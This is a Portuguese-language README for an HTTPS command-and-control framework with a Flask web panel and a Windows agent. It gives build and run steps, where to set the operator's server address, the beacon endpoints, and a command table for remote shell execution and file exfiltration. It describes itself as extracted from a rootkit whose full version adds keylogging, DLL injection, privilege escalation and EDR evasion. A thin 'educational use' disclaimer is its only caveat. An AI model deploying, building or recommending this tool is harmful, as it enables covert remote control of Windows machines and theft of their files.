
Framework C&C HTTPS com beacons criptografados, painel web e agente Windows.

Infraestrutura de Comando e Controle HTTPS com painel web para gerenciamento remoto de agentes Windows.
⚠️ Apenas para Uso Educacional - Uso ilegal é de sua responsabilidade.
Servidor:
cd server
pip install flask
python c2_server.py
Acesse o painel: https://localhost:8443
Cliente:
build.bat
Edite client/c2_client.cpp para definir o IP do servidor:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
Criptografia: XOR + Base64
Chave: Hostname + Username + "SecretKey2025"
Transporte: HTTPS (porta 8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
Servidor: Python 3.9+, Flask
Cliente: MinGW-w64 GCC 15.2+, Windows SDK, C++17
Este framework C2 foi extraído do projeto XvX Usermode Rootkit. A versão completa do rootkit inclui um C2 mais completo com mais de 15 comandos, incluindo ocultação de processo/arquivo/registro, elevação de privilégio para SYSTEM, shells reversos interativos, funcionalidade de keylogger, injeção de DLL e técnicas de evasão de EDR. Esta versão autônoma fornece a infraestrutura central do C2 para fins educacionais e fácil integração em projetos personalizados.
Autor: 28zaakypro[@]proton[.]me
| Comando | Sintaxe | Descrição |
|---|
shell | shell <cmd> | Executa comando shell |
exfil | exfil <path> | Exfiltra arquivo (Base64) |
sleep | sleep <seconds> | Altera intervalo de beacon |
ping | ping | Testa conectividade |
die | die | Encerra agente |